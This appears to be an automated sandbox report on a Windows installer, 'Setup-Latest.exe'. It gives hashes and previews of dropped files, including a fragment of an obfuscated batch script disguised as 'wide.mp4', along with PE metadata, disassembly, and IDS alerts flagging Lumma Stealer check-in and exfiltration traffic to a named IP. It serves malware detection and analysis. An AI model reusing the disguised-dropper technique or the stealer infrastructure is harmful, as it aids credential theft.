                                    SSDEEP:1536:ChYwoz3JBCfmLj6irSrB5y67uj5aszsRYZmBgxepzeq/jEyln2gjGwl7RNiyU:eYww3JBmmLjlrSrf7W53JoBgkleqbEMA
                                    MD5:5EA3B8B3C56EE7D1351B01CB894D37FB
                                    SHA1:CDFB9E72F0463FD5110F20C2E3D68C2CE1979C6C
                                    SHA-256:31EF6BDDE2159CF40BA21DC10C0A24918FC2A93808343FB2B55679558477718F
                                    SHA-512:AB83F5AB0EF9E6ABCAA7A29400B6D2E75D92771191F5B8A4AE107EFB6F1E891F6A9565C2FE0C684073AA9A10EB6802067811D4BB90109357DCBA6800BA00BB37
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):102400
                                    Entropy (8bit):6.403516475628563
                                    Encrypted:false
                                    SSDEEP:3072:WfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfF:WfhnvO5bLezWWt/Dd314V14ZgP0w
                                    MD5:51A069ED9281718F826D41478B0A7549
                                    SHA1:70B6E51126DC21BEDF646FC640DD623C88BDC431
                                    SHA-256:1FE97DF39FAA189EC1B9106E2745590ADC28B4D53A69E1DCF52D163913114877
                                    SHA-512:FD2A5353F8CBE0432FC6840C568828FD4F21A6AA3C981311AD9034B5B542BDDC73E32B117B952AD66868DCBA0EB5FDBBD7ED33B97F0B19EC444E4AB977F8A544
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):58531
                                    Entropy (8bit):7.996297027203052
                                    Encrypted:true
                                    SSDEEP:1536:4hRRNQUI7rdU1UDl5nD9glLCxGsASWrTy:4hRDwxsilJD9gFCxGsPf
                                    MD5:FEC8E7AB6AAD11105BF0C6CFD0303849
                                    SHA1:F497AF8EF0F220F5A88DCE5871C8AE072782E8DE
                                    SHA-256:97992CC1EBB37AE53971AD56E234E8157CCA8D93C69497747C9FB77EAAE8E050
                                    SHA-512:F2CBB554BF6C4F371A894A4CFE27584B6E6D8C7FC052FE9A912E9482BA5CB4C9986F12DFA815153175E187575225A91FD1AAAADF882D549C68C55FCAAA61FEB8
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):91136
                                    Entropy (8bit):7.997765180053721
                                    Encrypted:true
                                    SSDEEP:1536:BWTUkNhPcMSPVpVeJN4oR7q8UODkTYRMJn6/ju9xPR3jrwK35t4E:BWTxNhPcMStXeJhq8VkTh6YxJ33wsbz
                                    MD5:6DC907CAD908B929CA1F16C09ECCC57B
                                    SHA1:89C98295B3CAF422021B966D3F0DF18E83CA70F5
                                    SHA-256:FDEECBF6166F5CEFF982C7A4131589CA3AF7F71F8B5C4F4BABFAA53B973D9EDF
                                    SHA-512:153351CF07D1622BE5182E6AF4F45D7C1CD28121CD2034677A7358EAE5B52F5B47A4AB82F1464923BAE6716EAA5C2F91703D97E79D117E6006374FF3791C83AE
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):103424
                                    Entropy (8bit):5.875802200515394
                                    Encrypted:false
                                    SSDEEP:1536:J6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPt:Jq8QLeAg0Fuz08XvBNbjaAtsPt
                                    MD5:278722175E3D420CB44282477C2811E9
                                    SHA1:F7246A2B43DC80493BC9C2E27DBB0794CACE09C8
                                    SHA-256:D56EE71B68B9DA84BEE2D64A83F0D3C1DD80B8E27D9BCC240F068DFBB24425E2
                                    SHA-512:75A30B2349F72209E3DE32E8C66A28000AF53319ADFEB14092691ECC79B6DA2C0E68D8A65762E93ED5032D790BC5F4CE04E15FB225BA4B169CCED0470A3073D4
                                    Malicious:false
                                    Preview:..`.* ......a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.s.y.n.c.h.-.l.1.-.2.-.0...d.l.l.....k.e.r.n.e.l.3.2...d.l.l.....InitializeConditionVariable.SleepConditionVariableCS....WakeAllConditionVariable.....CL...B...B.Unknown exception...0DL...B...B.bad allocation..|DL...B...B.bad array new length.....DL.n.B.X.M...M.((I.8A.O....^......E.R.R.O.R. .:. .U.n.a.b.l.e. .t.o. .i.n.i.t.i.a.l.i.z.e. .c.r.i.t.i.c.a.l. .s.e.c.t.i.o.n. .i.n. .C.A.t.l.B.a.s.e.M.o.d.u.l.e.......csm................. .............J...J.H.J.a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.f.i.b.e.r.s.-.l.1.-.1.-.1...a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.s.y.n.c.h.-.l.1.-.2.-.0.....k.e.r.n.e.l.3.2.....a.p.i.-.m.s.-...e.x.t.-.m.s.-...........FlsAlloc............FlsFree.........FlsGetValue.........FlsSetValue.........InitializeCriticalSectionEx..EL...B...B.bad exception.....J...J...J...J...J...J...J...J...J...J...J.$.J.,.J.8.J.D.J.N.J.P.J.X.J.`.J.d.J.h.J.l.J.p.J.t.J.x.J.|.J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J.
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):97280
                                    Entropy (8bit):6.676869777709325
                                    Encrypted:false
                                    SSDEEP:1536:ixv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbY:g5mjccBiqXvpgF4qv+32eOyKODOSpQSB
                                    MD5:BF83026F801F9FF754FC88D937CA1E08
                                    SHA1:995F512E1452D7B1B8BF6ACC1CAD4A97E5D67138
                                    SHA-256:4CB81DBC3C21BC612B3E70BBCC515E4B99F7A82B8C39FBEC2315D430B30FA53C
                                    SHA-512:EB3FB93CA0982F0B2DBC70694FE0AB0C151D67C3C58025951593384CC020EB7006FAEF99EF8F5344A9A0A74698F5C332F34826180F223B77782912263B4459C0
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):132096
                                    Entropy (8bit):6.377855016772332
                                    Encrypted:false
                                    SSDEEP:3072:/g5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfr:45vPeDkjGgQaE/loUDtfr
                                    MD5:61DFE44D20EEEA4E73F494D30A371F8F
                                    SHA1:6BD26783B24F1A4E1813F5C1B1D5EE3D215C39DA
                                    SHA-256:E7EDE2194B1C1C501A5D61F2365E42E8A9F186B036A639163165BF6737CD73B1
                                    SHA-512:211E140A4D9064F6011C346BDD016DE7D38A823457029E0A13ECD8989C09A4C81509A7ADCFDA1B05553B04C9D186C2000C691B566D21E5AE3C452CBBE3641F29
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):60796
                                    Entropy (8bit):6.7963392656053925
                                    Encrypted:false
                                    SSDEEP:1536:Wo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:WNoGmROL7F1G7ho2kOb
                                    MD5:6DFF01D20DAC1DF6B76115A500A13A94
                                    SHA1:71BC9419B18568112D2CB9EB6A85E017850C2391
                                    SHA-256:7E530D5163218B0CA02450150218A0F24C6F8179DFBD31B58121604115AD8362
                                    SHA-512:F3F75F8D251724381D526373BBA5F716A4C9F57593F825BFB40444FAE25CA2E2E3F27ED1E07ABCEDE3E03F0C3428A0905073B0E67C56376764A1A44753748909
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:ASCII text, with very long lines (548), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14822
                                    Entropy (8bit):5.178112333023097
                                    Encrypted:false
                                    SSDEEP:384:dwaVOOqcLlU/xHZdwb5029PJK5e3KkTg5o5YILnweV4SknBO:diOq0lGPS02BJEe3KjaweknI
                                    MD5:7E4CF5266498C16090BA55F200F39973
                                    SHA1:76D6CFA9C48D5EC5DC2410A61DFFF30343434390
                                    SHA-256:F9DFFD2A81287E0C2CB1BB77F33E7000BFD875F6ADC796EE9E1BFBC6B6B9F083
                                    SHA-512:3AE8D7F61B9D28832B44B41A9F7D6C82C75B32AB745D93953C8E1CBE1E4DA2DEC4928CB958D09C79B1B41788F023AD12FC554D34E6DE3310A6F480BB6F8C167C
                                    Malicious:false
                                    Preview:Set Women=U..ZEFigured-Women-Chairman-Inflation-Von-Faced-Eden-Analyses-Newest-..MvSpent-Floral-Including-Reproduce-Accounts-Hydraulic-Dealers-Nightlife-Blocking-..kqHWins-Industry-Complaint-Coat-Periodically-Stainless-..XkwQ-Concerns-Blocked-Www-..MaQyTerritories-Hdtv-November-Detroit-Mega-Fortune-..jnVExperiments-Regression-Enters-Municipality-..rtETextile-Castle-Hb-Facial-..Set Adaptation=6..IXEBibliographic-..YVShipment-..HFVideos-..jnWuSh-Viewer-Checks-Brook-Hardware-Beginner-Pda-Actress-Mpg-..dyzjIncreases-Comp-..WWpJAlt-French-Household-Continues-Nevertheless-Coordinator-Essays-Wc-House-..bSZVictims-Prayers-Archives-Evaluating-..ntLBStrengths-Solving-Employer-..Set Pierre=A..dyCbPhentermine-Pointing-Vancouver-Mv-Gregory-Trials-Beings-Prisoner-Authentication-..ajZATorture-Preceding-..lyFinland-Marketplace-Enclosed-Incident-Instructor-Latex-Virtually-Electrical-..wIzzCycle-Strange-Friendship-Reverse-Juice-Shore-Spine-..WfcDShopzilla-Rules-Operates-Amendments-Florists-Fixed-..duCed
                                    Process:C:\Windows\SysWOW64\expand.exe
                                    File Type:ASCII text, with very long lines (548), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14822
                                    Entropy (8bit):5.178112333023097
                                    Encrypted:false
                                    SSDEEP:384:dwaVOOqcLlU/xHZdwb5029PJK5e3KkTg5o5YILnweV4SknBO:diOq0lGPS02BJEe3KjaweknI
                                    MD5:7E4CF5266498C16090BA55F200F39973
                                    SHA1:76D6CFA9C48D5EC5DC2410A61DFFF30343434390
                                    SHA-256:F9DFFD2A81287E0C2CB1BB77F33E7000BFD875F6ADC796EE9E1BFBC6B6B9F083
                                    SHA-512:3AE8D7F61B9D28832B44B41A9F7D6C82C75B32AB745D93953C8E1CBE1E4DA2DEC4928CB958D09C79B1B41788F023AD12FC554D34E6DE3310A6F480BB6F8C167C
                                    Malicious:false
                                    Preview:Set Women=U..ZEFigured-Women-Chairman-Inflation-Von-Faced-Eden-Analyses-Newest-..MvSpent-Floral-Including-Reproduce-Accounts-Hydraulic-Dealers-Nightlife-Blocking-..kqHWins-Industry-Complaint-Coat-Periodically-Stainless-..XkwQ-Concerns-Blocked-Www-..MaQyTerritories-Hdtv-November-Detroit-Mega-Fortune-..jnVExperiments-Regression-Enters-Municipality-..rtETextile-Castle-Hb-Facial-..Set Adaptation=6..IXEBibliographic-..YVShipment-..HFVideos-..jnWuSh-Viewer-Checks-Brook-Hardware-Beginner-Pda-Actress-Mpg-..dyzjIncreases-Comp-..WWpJAlt-French-Household-Continues-Nevertheless-Coordinator-Essays-Wc-House-..bSZVictims-Prayers-Archives-Evaluating-..ntLBStrengths-Solving-Employer-..Set Pierre=A..dyCbPhentermine-Pointing-Vancouver-Mv-Gregory-Trials-Beings-Prisoner-Authentication-..ajZATorture-Preceding-..lyFinland-Marketplace-Enclosed-Incident-Instructor-Latex-Virtually-Electrical-..wIzzCycle-Strange-Friendship-Reverse-Juice-Shore-Spine-..WfcDShopzilla-Rules-Operates-Amendments-Florists-Fixed-..duCed
                                    Process:C:\Windows\SysWOW64\expand.exe
                                    File Type:ASCII text, with CRLF, CR, LF line terminators
                                    Category:dropped
                                    Size (bytes):167
                                    Entropy (8bit):4.808946640512676
                                    Encrypted:false
                                    SSDEEP:3:RGXKRjN3MZ9aSLKLbzXDD9jmKXVM8/FAJoDYTzMKpVteSMsIVOqSRIVbUbFHgzK+:zx3MmSLQHtBXVNsTTISM7vSRoIAzKs7
                                    MD5:A14C8E1DDDC9FD927A50CFF2435A7799
                                    SHA1:47F4AC00DBF7563A2D025AA9D72E5BDEDCBDC3DC
                                    SHA-256:247A99FF374C62520693BA4CF08F35E1862ACF8E5D61055513A3C4F9F7B77454
                                    SHA-512:94FC2D645CD89A43D86B368B64BCD1FB13C412137F8AAF300833EC7FC678EE71C0B29866D392D11332E9DD75593B7AA816C073D3AEEA1985E813B0FCDEB2F065
                                    Malicious:false
                                    Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Copying wide.mp4 to wide.mp4.bat...wide.mp4: 14822 bytes copied.....
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.718085500786066
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Setup-Latest.exe
                                    File size:1'444'885 bytes
                                    MD5:d905d14928e2766285ed7ca83eaaf4b3
                                    SHA1:5d27b2c538c81f7819f7de1071c28ecd03c5bd2e
                                    SHA256:721f6073f9ec13d9a1b7cff7b7cfab342ec6fd5ebc1a95c006ae11198e8abfc9
                                    SHA512:88862cdfde9a0bbedad8f16c0387ac305802434daf55e813614d33383edca078fea89f65ceea0f79d60582739807f8a23ce7f7f2083f56e7bed191305dea7619
                                    SSDEEP:24576:oGXt9+6qjfYMk9qXo1UPDPdDoIKgweD1F4h/ym4iB5ePtH4M/d8rOn21:ZXt9+nfUsSs1oIK+7Kv5e1D/6rO21
                                    TLSH:C76502D3ED8066E5FCBA0539E4370C650667BC278AD91E1F61C4B62918B30535A3FE2B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....
                                    Icon Hash:70f8f4cca4f0b090
                                    Entrypoint:0x4038af
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push ebp
                                    push esi
                                    push edi
                                    push 00000020h
                                    xor ebp, ebp
                                    pop esi
                                    mov dword ptr [esp+18h], ebp
                                    mov dword ptr [esp+10h], 0040A268h
                                    mov dword ptr [esp+14h], ebp
                                    call dword ptr [00409030h]
                                    push 00008001h
                                    call dword ptr [004090B4h]
                                    push ebp
                                    call dword ptr [004092C0h]
                                    push 00000008h
                                    mov dword ptr [0047EB98h], eax
                                    call 00007F968863F74Bh
                                    push ebp
                                    push 000002B4h
                                    mov dword ptr [0047EAB0h], eax
                                    lea eax, dword ptr [esp+38h]
                                    push eax
                                    push ebp
                                    push 0040A264h
                                    call dword ptr [00409184h]
                                    push 0040A24Ch
                                    push 00476AA0h
                                    call 00007F968863F42Dh
                                    call dword ptr [004090B0h]
                                    push eax
                                    mov edi, 004CF0A0h
                                    push edi
                                    call 00007F968863F41Bh
                                    push ebp
                                    call dword ptr [00409134h]
                                    cmp word ptr [004CF0A0h], 0022h
                                    mov dword ptr [0047EAB8h], eax
                                    mov eax, edi
                                    jne 00007F968863CD1Ah
                                    push 00000022h
                                    pop esi
                                    mov eax, 004CF0A2h
                                    push esi
                                    push eax
                                    call 00007F968863F0F1h
                                    push eax
                                    call dword ptr [00409260h]
                                    mov esi, eax
                                    mov dword ptr [esp+1Ch], esi
                                    jmp 00007F968863CDA3h
                                    push 00000020h
                                    pop ebx
                                    cmp ax, bx
                                    jne 00007F968863CD1Ah
                                    add esi, 02h
                                    cmp word ptr [esi], bx
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x59bf0 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x100000 | 0x59bf0 | 0x59c00 | acd5443f264e726442ae2af07f8bdb5a | False | 0.6048158948467967 | data | 6.306430627767441 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x15a000 | 0xfd6 | 0x1000 | fa4a4c5c82d91034c29d65a3dc8522da | False | 0.1904296875 | data | 2.4330952769333423 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x1001f0 | 0x44028 | Device independent bitmap graphic, 256 x 512 x 32, image size 278528 | English | United States | 0.5892313546423136
                                    RT_ICON | 0x144218 | 0x11028 | Device independent bitmap graphic, 128 x 256 x 32, image size 69632 | English | United States | 0.6515816970949593
                                    RT_ICON | 0x155240 | 0x4428 | Device independent bitmap graphic, 64 x 128 x 32, image size 17408 | English | United States | 0.6806510774873911
                                    RT_DIALOG | 0x159668 | 0x100 | data | English | United States | 0.5234375
                                    RT_DIALOG | 0x159768 | 0x11c | data | English | United States | 0.6056338028169014
                                    RT_DIALOG | 0x159888 | 0x60 | data | English | United States | 0.7291666666666666
                                    RT_GROUP_ICON | 0x1598e8 | 0x30 | data | English | United States | 0.8541666666666666
                                    RT_MANIFEST | 0x159918 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                                    DLL | Import
                                    KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                    USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                    GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                    ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                    COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2025-02-14T16:55:55.172476+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:55.683804+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:55.683804+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:56.196791+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:56.847472+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:57.459844+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:58.812520+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:55:59.322762+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:56:00.447277+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:56:01.763539+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:56:03.118342+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:56:05.414362+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
                                    2025-02-14T16:56:05.960131+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Feb 14, 2025 16:56:03.119873047 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.120810032 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121350050 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121397972 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.121515036 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121557951 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.121676922 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121834993 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.121978998 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122020006 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122183084 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122225046 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122395039 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122432947 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122452021 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122481108 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122627974 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122673035 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122711897 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122734070 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122821093 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122864962 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122921944 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122941971 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.123034000 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.123107910 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.123145103 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.131129980 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.918935061 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.919050932 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.919239998 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.919488907 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.919533014 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.922645092 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.922689915 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.922779083 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.923212051 CET49744443192.168.2.4188.114.97.3
